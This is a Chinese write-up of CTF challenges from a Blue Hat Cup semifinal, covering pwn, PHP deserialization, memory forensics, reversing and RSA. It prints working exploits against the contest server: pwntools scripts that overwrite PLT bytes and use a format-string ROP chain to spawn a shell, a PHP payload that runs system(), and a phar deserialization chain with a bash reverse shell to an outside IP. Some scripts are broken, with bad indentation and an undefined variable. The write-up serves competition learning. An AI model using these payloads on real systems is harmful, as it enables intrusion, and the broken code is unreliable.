蓝帽杯半决赛魔法少女继续摸WriteUP-魔法少女雪殇

半决赛去了哈尔滨，跟好多师傅成功面基，很不错的一场旅行，北邮太卷了，差一名进决赛，呜呜呜，最后总排名第八，北部赛区第7，这太。。。呜呜哭了

cover

反编译，逻辑很简单，首先值得注意的是开了mprotect，来有了很大部分的可写能力
然后大体逻辑就是可以向任意地址写入一个低字节，一般思路是写got但是中间有个判断，got地址太大，不如写plt

然后构造字节错位覆盖低字节
exp如下

from pwn import *

local = 0

#binary = './pwn'
# libc_path = ''
port = 12435

if local == 1:
    p = process(binary)
else:
    p = remote('118.190.62.234',port)

def dbg():
    context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']

bypass_addr = 0x8048888

dbg()
p.recvuntil("this")
# 修改puts_got为system_got
# puts 0x80484d0
# system 0x80484e0
p.send(p32(0x80484d2) + p8(0x24))
p.recvuntil("name")
p.send("/bin/sh\x00")


# gdb.attach(p)
p.interactive()

杰克与肉丝

php反序列化，用php原生类绕md5，极客大挑战考点

<?php
class Titanic{
	public $people;
	public $ship;
	function __construct(){
	$this->people = new Jack();
	$this->ship = new Love();
	}
}
class Love {
	public $var;
	function __construct(){
		$this->var = new Rose();
	}
}
class Jack{
		private $action;
		function __set($a, $b){
			$b->$a();
	}
}
class Rose {
	public $var1,$var2;
	public function __construct(){
		$cmd ='?><?php system("cat /flag") ?>';
		$ex1 = new Exception($cmd);$ex2 = new Exception($cmd,1);
		$this->var1 = $ex1;
		$this->var2 = $ex2;
	}
}
echo urlencode(serialize(new Titanic()));

payload:

?
love=O%3A7%3A%22Titanic%22%3A2%3A%7Bs%3A6%3A%22people%22%3BO%3A4%3A%22Jack%22%3A
1%3A%7Bs%3A12%3A%22%00Jack%00action%22%3BN%3B%7Ds%3A4%3A%22ship%22%3BO%3A4%3A%22
Love%22%3A1%3A%7Bs%3A3%3A%22var%22%3BO%3A4%3A%22Rose%22%3A2%3A%7Bs%3A4%3A%22var1
%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A30%
3A%22%3F%3E%3C%3Fphp+system%28%22cat+%2Fflag%22%29+%3F%3E%22%3Bs%3A17%3A%22%00Ex
ception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3
A7%3A%22%00%2A%00file%22%3Bs%3A26%3A%22F%3A%5Ctimu%5Cshorturl%5Caaaaa.php%22%3Bs
%3A7%3A%22%00%2A%00line%22%3Bi%3A33%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A
3%3A%7Bi%3A0%3Ba%3A6%3A%7Bs%3A4%3A%22file%22%3Bs%3A26%3A%22F%3A%5Ctimu%5Cshortur
l%5Caaaaa.php%22%3Bs%3A4%3A%22line%22%3Bi%3A15%3Bs%3A8%3A%22function%22%3Bs%3A11
%3A%22__construct%22%3Bs%3A5%3A%22class%22%3Bs%3A4%3A%22Rose%22%3Bs%3A4%3A%22typ
e%22%3Bs%3A2%3A%22-
%3E%22%3Bs%3A4%3A%22args%22%3Ba%3A0%3A%7B%7D%7Di%3A1%3Ba%3A6%3A%7Bs%3A4%3A%22fil
e%22%3Bs%3A26%3A%22F%3A%5Ctimu%5Cshorturl%5Caaaaa.php%22%3Bs%3A4%3A%22line%22%3B
i%3A7%3Bs%3A8%3A%22function%22%3Bs%3A11%3A%22__construct%22%3Bs%3A5%3A%22class%2
2%3Bs%3A4%3A%22Love%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%22-
%3E%22%3Bs%3A4%3A%22args%22%3Ba%3A0%3A%7B%7D%7Di%3A2%3Ba%3A6%3A%7Bs%3A4%3A%22fil
e%22%3Bs%3A26%3A%22F%3A%5Ctimu%5Cshorturl%5Caaaaa.php%22%3Bs%3A4%3A%22line%22%3B
i%3A39%3Bs%3A8%3A%22function%22%3Bs%3A11%3A%22__construct%22%3Bs%3A5%3A%22class%
22%3Bs%3A7%3A%22Titanic%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%22-
%3E%22%3Bs%3A4%3A%22args%22%3Ba%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00Exception%00pre
vious%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3
A%22%00%2A%00message%22%3Bs%3A30%3A%22%3F%3E%3C%3Fphp+system%28%22cat+%2Fflag%22
%29+%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A
%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A26%3A%22F%3A%5Ct
imu%5Cshorturl%5Caaaaa.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A33%3Bs%3A16%3A
%22%00Exception%00trace%22%3Ba%3A3%3A%7Bi%3A0%3Ba%3A6%3A%7Bs%3A4%3A%22file%22%3B
s%3A26%3A%22F%3A%5Ctimu%5Cshorturl%5Caaaaa.php%22%3Bs%3A4%3A%22line%22%3Bi%3A15%
3Bs%3A8%3A%22function%22%3Bs%3A11%3A%22__construct%22%3Bs%3A5%3A%22class%22%3Bs%
3A4%3A%22Rose%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%22-
%3E%22%3Bs%3A4%3A%22args%22%3Ba%3A0%3A%7B%7D%7Di%3A1%3Ba%3A6%3A%7Bs%3A4%3A%22fil
e%22%3Bs%3A26%3A%22F%3A%5Ctimu%5Cshorturl%5Caaaaa.php%22%3Bs%3A4%3A%22line%22%3B
i%3A7%3Bs%3A8%3A%22function%22%3Bs%3A11%3A%22__construct%22%3Bs%3A5%3A%22class%2
2%3Bs%3A4%3A%22Love%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%22-
%3E%22%3Bs%3A4%3A%22args%22%3Ba%3A0%3A%7B%7D%7Di%3A2%3Ba%3A6%3A%7Bs%3A4%3A%22fil
e%22%3Bs%3A26%3A%22F%3A%5Ctimu%5Cshorturl%5Caaaaa.php%22%3Bs%3A4%3A%22line%22%3B
i%3A39%3Bs%3A8%3A%22function%22%3Bs%3A11%3A%22__construct%22%3Bs%3A5%3A%22class%
22%3Bs%3A7%3A%22Titanic%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%22-
%3E%22%3Bs%3A4%3A%22args%22%3Ba%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00Exception%00pre
vious%22%3BN%3B%7D%7D%7D%7D

不一样的web

注释有两个类，文件上传白名单，还有check，猜测phar反序列化，先去读lib.php:

class Read{
	public $name;
	public function file_get()
	{
		$text = base64_encode(file_get_contents("lib.php"));
		echo $text;
	}
}
class Test{
	public $f;
	public function __construct($value){
		$this->f = $value;
}
	public function __wakeup()
	{
		$func = $this->f;
		$func();
	}
}
$filename = 'poc.phar';
file_exists($filename) ? unlink($filename) : null;
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Test('Read::file_get'));
$phar->addFromString("foo.txt","bar");
$phar->stopBuffering();
?>

然后修改成gif上传，phar触发反序列化：

读出lib.php

<?php
error_reporting(0);
class Modifier{
	public $old_id;
	public $new_id;
	public $p_id;
	public function __construct(){
		$this->old_id = "1";
		$this->new_id = "0";
		$this->p_id = "1";
}
	public function __get($value){
		$new_id = $value;
		$this->old_id = random_bytes(16);
		if($this->old_id===$this->new_id){
			echo 'yes';
		}
	}
}
class Read{
	public function file_get()
	{
	$text = base64_encode(file_get_contents("lib.php"));
	echo $text;
	}
}
class Files{
	public $filename;
	public function __construct($filename){
		$this->filename = $this->FilesWaf($filename);
	}
	public function __wakeup(){
		$this->FilesWaf($this->filename);
	}
	public function __toString(){
		return $this->filename;
	}
	public function __destruct(){
		echo "Your file is ".$this->FilesWaf($this->filename).".</br>";
	}
	public function FilesWaf($name){
		if(stristr($name, "/")!==False){
			return "index.php";
		}
		return $name;
	}
}
class Test{
	public $f;
	public function __construct($value){
		$this->f = $value;
	}
	public function __wakeup()
	{
		$func = $this->f;
		$func();
	}
}
class User{
	public $name;
	public $profile;
	public function __construct($name){
		$this->name = $this->UserWaf($name);
		$this->profile = "I am admin.";
	}
	public function __wakeup(){
		$this->UserWaf($this->name);
	}
	public function __toString(){
		return $this->profile->name;
	}
	public function __destruct(){
		echo "Hello ".$this->UserWaf($this->name).".</br>";
	}
	public function UserWaf($name){
		if(strlen($name)>10){
			return "admin";
	}
		if(!preg_match("/[a-f0-9]/iu",$name)){
			return "admin";
		}
		return $name;
	}
}

通过user的析构函数触发tostring，然后触发Modifier的get方法。exp:

<?php
class Modifier{
	public $old_id;
	public $new_id ;
	public $p_id = 'bash -c "bash -i >& /dev/tcp/8.141.49.228/9999 0>&1"';
}
class User{
	public $name;
	public $profile;
}
$p1 = new User;
$p2 = new User;
$p1->name = $p2;
$p3 = new Modifier;
$p2->profile = $p3;
$p3->new_id = &$p3->old_id;
$filename = 'poc.phar';
file_exists($filename) ? unlink($filename) : null;
$phar=new Phar($filename);
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($p1);
$phar->addFromString("foo.txt","bar");
$phar->stopBuffering();

上传，触发反弹shell

没看到flag，跟目录有个game，下载下来放进idea，得到密码。有个flag用户。于是su flag
然后查看flag

博人的文件

解压获得raw文件和hacker.zip,hacker.zip需要密码，有个描述

彳亍，直接vol对raw取证

题目说了pdf，那就直接

volatility -f /root/桌面/博人的电脑.raw –profile=Win7SP1x64_23418 filescan|grep -e pdf

直接dump出来010打开

发现关键字段，回到raw继续寻找

文件很多，这里做了个根据文件大小直接导出svhost.zip.zip

里面是个exe，丢入ida分析没啥结果，图标显示pyc程序的图标

这里用了个骚操作用pyinstxtractor进行解密，获得dict里面的一个transfer，重命名pyc然后进行re，分离源代码

# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.4 (tags/v3.7.4:e09359112e, Jul  8 2019, 20:34:20) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: transfer.py
# Compiled at: 2021-06-03 15:40:11
# Size of source mod 2**32: 214 bytes
import paramiko, datetime, os
hostname = '192.168.0.129'
username = 'fei'
password = ''
port = 22

def upload(local_dir, remote_dir):
    try:
        t = paramiko.Transport((hostname, port))
        t.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(t)
        for root, dirs, files in os.walk(local_dir):
            for filespath in files:
                local_file = os.path.join(root, filespath)
                a = local_file.replace(local_dir, '').replace('\\', '/').lstrip('/')
                remote_file = os.path.join(remote_dir, a)
                try:
                    sftp.put(local_file, remote_file)
                except Exception as e:
                    try:
                        sftp.mkdir(os.path.split(remote_file)[0])
                        sftp.put(local_file, remote_file)
                    finally:
                        e = None
                        del e

            for name in dirs:
                local_path = os.path.join(root, name)
                a = local_path.replace(local_dir, '').replace('\\', '')
                remote_path = os.path.join(remote_dir, a)
                try:
                    sftp.mkdir(remote_path)
                except Exception as e:
                    try:
                        print(55, e)
                    finally:
                        e = None
                        del e

        t.close()
    except Exception as e:
        try:
            pass
        finally:
            e = None
            del e


if __name__ == '__main__':
    local_dir = 'C:\\Program Files\\setups'
    remote_dir = '/home/share/'
    upload(local_dir, remote_dir)
# okay decompiling .\transfer.pyc

通过此处获得hostname和ip，然后解压hacker.zip

寻找一番，吐了，然后发现setup比较可疑，丢入010发现是pk头，解压需要密码

此处确实过于脑洞，于是直接问了工作人员

彳亍，raw里面内存的密码，直接hashdump

尝试解密，Hush的第二个字段可以解密

成功将其hacker.zip解密，获得图片

放大可以看见一些点，应该是缩略图，但是缩略图的间距并不统一，麻了，爆破吧

from PIL import Image
import sys
import time
for i in range(220, 245):
	for j in range(59, 61):
		img=Image.open('result.png') 
		img = img.resize((i, j), Image.NEAREST)
		img.save(str(i)  + 'x' + str(j) + '.png')

获得图片

嗯套，屑题

src_leak

百度搜索，原题：

(8条消息) 【Writeup】i春秋网络安全领域专项技能赛_Reverse_srcleak_BAKUMANSEC – Just Do It-CSDN博客

flag都不变，嗯！

flag{927369-19324816-44435556-3996001-9865881-1229}

py交易

这波啊，这波是原题x2

Python字节码解混淆之反控制流扁平化！ – 知乎 (zhihu.com)

Python字节码解混淆 – 安全客，安全资讯平台 (anquanke.com)

蚌埠煮了，稍作修改

from math import sqrt
def solve(a,b,c):
    delta = b*b-4*a*c
    assert delta >= 0
    x1 = (-b + sqrt(delta))/(2*a)
    x2 = (-b - sqrt(delta))/(2*a)
    x1 = int(round(x1))
    x2 = int(round(x2))
    if x1>=0x20 and x1 < 0x7f:
        return x1
    else:
        return x2

a = [13433, 4747, 17752, 33060, 31051, 48809, 29988, 6421, 20021, 38888, 24844, 20706, 11713, 34938, 12865, 6085, 37391, 32840, 31964, 27194, 8701, 48142, 27066, 28626, 37431, 39142, 46795, 21771, 44280, 40628, 35013, 18583, 5418, 4347, 43929, 9934, 46892, 19868]
b = [13711, 7074, 79833, 42654, 23241, 41412, 61795, 6373, 19304, 1363, 1682, 66279, 76134, 60748, 10355, 63484, 30491, 34005, 51393, 38029, 7241, 4998, 18562, 16935, 66677, 51321, 13771, 49108, 52166, 8851, 16900, 31682, 16684, 12046, 16764, 64315, 76742, 14022]
c = [832832835, -924053193, -307134635, -527578092, 998625960, -715102211, 3572182, -963194083, -475718185, -361574731, -678171563, 107566155, 608670527, 254218946, -81206308, -284228457, 373369420, 659110852, 165298084, -389004184, 893094421, -868933443, 44838205, -98551062, -59800920, -575871298, -748337118, 696390966, 427210246, -266607884, -555200820, -594235119, -233255094, 229291711, 711922719, 14476464, -783373820, 892608580]
d = [973988289, -867920193, -132362266, -172451190, 1471255182, -242282199, 321870424, -897049789, -428663209, -256350703, -613466537, 321254055, 641759727, 344601346, -40281788, -217030057, 476060216, 767746297, 503093626, -102198850, 984358207, -415480559, 322813233, 178032672, 48876640, -467362638, -260077296, 923436845, 536082660, -138702820, -210365307, -397666023, -215329942, 274852104, 818217684, 41479433, -632022956, 1204798830]
flag = ""
for i in range(38):
    flag += chr(solve(a[i],b[i],c[i]-d[i]))
print(flag)

very_smooth

参考文章：RSA 选择明密文攻击 – CTF Wiki (ctf-wiki.org)

先是sha256的一个爆破，常规爆破即可，后续来选择

e可知，N被隐藏，任意加密系统恢复N，根据hint，choice选择小于10000的素数，可得pq是相近的大素数，恢复出n最后分解即可

exp：

from pwn import *
import gmpy2
from Crypto.Util.number import *
from Crypto.PublicKey import RSA
import string
import codecs
import hashlib

def pwn():
    
    c2=Encode(2)
    c32=Encode(32)
    n=GCD(g,c2**5-c32)
    r.recvuntil('> ')
    r.sendline('2')
    r.recvline()
    rsa_key=r.recvuntil('-----END PUBLIC KEY-----')
    rsa_key=RSA.import_key(rsa_key)
    e=rsa_key.e

    r.recvuntil('a message: \n')
    c=r.recvline()[:-1]

    N=n
    n=2
    a=2
    while 1:
	    a=pow(a,n,N)
    	res=gmpy2.gcd(a-1,N)
    	if res!=1 and res!=N:
	    	p=res
	    	q=N//res
	    	break
	    n=n+1
    d=inverse(e,(p-1)*(q-1))

    flag = long_to_bytes(pow(c,d,n))

    print(flag)

def sha256decode():
    for a in str256:
	    for b in str256:
	    	for c in str256:
		    	for d in str256:
		    		str1=(a+b+c+d).encode()
			    	str2=str1+s
			    	hd=hashlib.sha256(str2).hexdigest()
			    	if h.decode()==hd:
				    	r.sendline(str1)
					    flag=True
	    			if flag:
		    			break
			    if flag:
				    break
		    if flag:
			    break
	    if flag:
		    break

def Encode(str):
	msg=codecs.encode(long_to_bytes(msg),'hex')
	r.sendline('1')
	r.recvline()
	r.sendline(msg)
	r.recvuntil('Here is your')
	rst = int(r.recvline()[:-1],16)
	return rst




if __name__ == '__main__':
    str256=string.ascii_letters+string.digits
    flag=False
    g=0
	context.log_level = 'debug'
    r=remote('118.190.62.234',61139)
    r.recvuntil('sha256(XXXX+')
    s=r.recvuntil(') == ')[:-5]
    h=r.recvline()[:-1]

    sha256decode()
	pwn()

hangman

漏洞就是格式化字符串，泄露出libc地址，然后利用格式化字符串修改返回地址为gadget

exp:

# _*_ coding:utf-8 _*_
from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
binary = './pwn'
elf = ELF(binary)
# p = process(binary)
libc = ELF("./libc-2.23.so")
p = remote("118.190.62.234", 33445)


def pwn():
    p.recvuntil("Enter a word")
    p.send("%p"*36)
    p.recvuntil("Guess a letter:")
    p.send("\x25")
    p.recvuntil('Guess a letter:')
    p.recv(8)
    p.recv(14*3)
    p.recvuntil('0x')

    data = int(p.recv(12), 16)
    log.success('data:'+ hex(data))
    addr = data - libc.sym['_IO_2_1_stdout_']
    log.success('addr:' + hex(addr))
    sys = addr + libc.sym['system']
    binsh = addr + libc.search(b'/bin/sh').__next__()

    p.recvuntil("Enter a word")
    p.send("%24$p"*3+'a')
    p.recvuntil("%24$p0x")
    stack = int(p.recv(12), 16)
    log.success('stack:'+ hex(stack))
    if stack & 0xffff > 2000:
        return

    p.recvuntil("Enter a word")
    p.send("%"+str((stack-0x20) & 0xffff)+"c"+"%31$hn"+28*'a')
    for i in range(20):
        p.recvuntil("Guess a letter:")
        p.send("\x25")

    p.send("\x25")

    p.recvuntil("Enter a word")
    pop_rdi = addr + 0x21112

    payload = b"%"+str((stack+0x90-0x100-8) & 0xffff)+b"c"+b"%57$hn"+b'aaaa'
    payload += p64(pop_rdi)+p64(binsh)+p64(sys)
    p.send(payload)
    for i in range(11):
        p.recvuntil("Guess a letter:")
        p.send("\x25")
    p.send("\x25")

    log.success('stack:'+ hex(stack))
    p.interactive()


if __name__ == '__main__':
	context.log_level = 'debug'
	while 1:
		pwn()
		p.close()
		p = remote("118.190.62.234", 33445)

文章版权归作者所有，未经允许请勿转载。

THE END